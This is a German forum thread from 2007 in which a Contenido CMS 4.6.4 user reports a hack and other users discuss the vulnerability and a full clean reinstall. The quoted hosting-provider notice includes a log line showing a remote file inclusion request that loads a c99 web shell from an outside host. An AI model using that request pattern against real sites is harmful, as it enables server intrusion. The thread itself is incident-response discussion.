Contenido gehackt!

[headcrab]

Hallo,

wie ich gerade erfahren habe, hat Contenido scheinbar eine Sicherheitslücke, die auf meinem Webspace ausgenutzt wurde um Schadsoftware zu installieren. Folgende Nachricht wurde mir angehängt:

Code: Alles auswählen

wiederum mussten wir einen über Ihre Präsenz ausgeführten Angriff auf
unseren Webserver registrieren. Erneut wurden die in der Software
"Contenido" bestehenden Lücke ausgenutzt, um fremden Code auf Ihrem
Webspace auszuführen.

Wir haben nun Ihre Präsenzen gesperrt, um weiteren Missbrauch zu
verhindern. Bitte teilen Sie uns mit, weswegen Sie Ihre Scripte nicht
abgesichert haben.

Bitte entfernen Sie auch alle von den Angreifern hinterlegten Dateien
(z.B. c99_3.php).

201.9.34.218 - - [04/Nov/2007:10:36:29 +0100] "POST
/contenido/includes/include.grouprights_subnav.php?cfg%5Bpath%5D%5Bconte
nido%5D=http%3A%2F%2Fmensagenss.hospedagemdesite.com%2Fcmd%2Fc99_2.txt%3
F& HTTP/1.1" 200 14356 aumeco.de
"http://aumeco.de/contenido/includes/include.grouprights_subnav.php?cfg%
5Bpath%5D%5Bcontenido%5D=http%3A%2F%2Fmensagenss.hospedagemdesite.com%2F
cmd%2Fc99_2.txt%3F&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR;
rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "-"

Ist diese Lücke schon bekannt und wie kann ich diese am schnellsten (am besten ohne Neuinstallation oder Upgrade) schließen?

Vielen Dank im Voraus für Eure Hilfe!

Grüße
Headcrab

PS: Ich verwende Contenido 4.6.4

[wosch]

Ist diese Lücke schon bekannt

Ja, siehe hier:
http://www.contenido.de/forum/viewtopic.php?t=18440

.. wie kann ich diese am schnellsten (am besten ohne Neuinstallation oder Upgrade) schließen?

Gar nicht. Warum steht im obigen Beitrag.

Und trete @kronk2002de mal sehr kräftig ans Schienbein, das was er oben schrieb hat er noch nicht angefangen (Tipps & Tricks) !!!

[Dodger77]

@wosch: Das dürfte nicht das gleiche Loch sein. Der von headcrab oben gepostete Logfile-Auszug zeigt doch, dass der Angriff über die Datei "contenido/includes/include.grouprights_subnav.php" erfolgte. Wenn mich nicht alles täuscht, war diese Lücke in der 4.6.4 halt noch drin. Ein Upgrade wäre da sicherlich sinnvoll gewesen.
Der von dir verlinkte Post, zeigt halt das Problem auf, dass bei einem Upgrade 4.4.x -> 4.6.x die "news.php" aus dem Mandantenverzeichnis nicht überschrieben wird und somit weiterhin eine Lücke darstellt.

@headcrab: Um eine Neuinstallation wirst du wohl nicht drum herum kommen. Und es sollte sich dabei um die aktuelle Version (4.6.23) handeln. Wie man da vorgeht, wird z.B. im von wosch geposteten Thread beschrieben.

[wosch]

@wosch: Das dürfte nicht das gleiche Loch sein.

Das weiß bzw. vermute ich auch.
Aber die Technik / Angriffsziel ist die gleiche, und natürlich auch der Weg wieder zu einer sauberen Installation zu kommen.

Du oder @kummer hatte mal was mit einer .htaccess als Schutz für alle Verzeichnisse (außer cms) gepostet, hier sollte man ansetzen um Lücken, die heute noch nicht bekannt sind, zu vermeiden.

[HerrB]

Und trete @kronk2002de mal sehr kräftig ans Schienbein, das was er oben schrieb hat er noch nicht angefangen (Tipps & Tricks) !!!

In etwa entspricht das dem Update-Szenario:
http://www.communido.net/faq/index.php? ... artlang=de (temporärer Link - wenn nicht mehr verfügbar, ersetze http://www.communido.net/faq durch http://faq.contenido.org).

Gruß
HerrB

[wosch]

Und trete @kronk2002de mal sehr kräftig ans Schienbein, das was er oben schrieb hat er noch nicht angefangen (Tipps & Tricks) !!!

In etwa entspricht das dem Update-Szenario:

HerrB, nein.
Da fehlt der entscheidende Schritt.
Ein kompromitiertes System muß komplett auf dem Server gelöscht werden.
Es kann niemand garantieren das nicht noch Fremd-Scripte in Verzeichnissen vorhanden sind.
Plus vorher die Schritte zur Datensicherung und Prüfung vor dem Rückspielen.